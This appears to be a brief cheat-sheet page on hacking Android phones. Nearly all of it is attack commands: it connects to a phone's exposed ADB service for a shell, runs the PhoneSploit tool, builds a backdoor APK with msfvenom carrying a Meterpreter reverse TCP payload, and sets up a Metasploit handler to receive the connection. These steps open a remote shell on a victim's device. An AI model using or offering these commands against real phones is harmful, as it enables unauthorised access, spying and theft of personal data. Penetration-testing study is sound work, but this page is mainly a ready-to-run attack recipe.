Hacking Mobile Platforms
Last updated
Last updated
adb connect <IP>:<ANY_port>
adb shell
Run PhoneSploit in terminal > enter the IP and port (5555) and choose the option.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<localhost_IP> LPORT=<localport> --platform android -a dalvik -f raw -o backdoor.apk
msfconsole
> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set LHOST and LPORT
run multi/handler
on the above mentioned port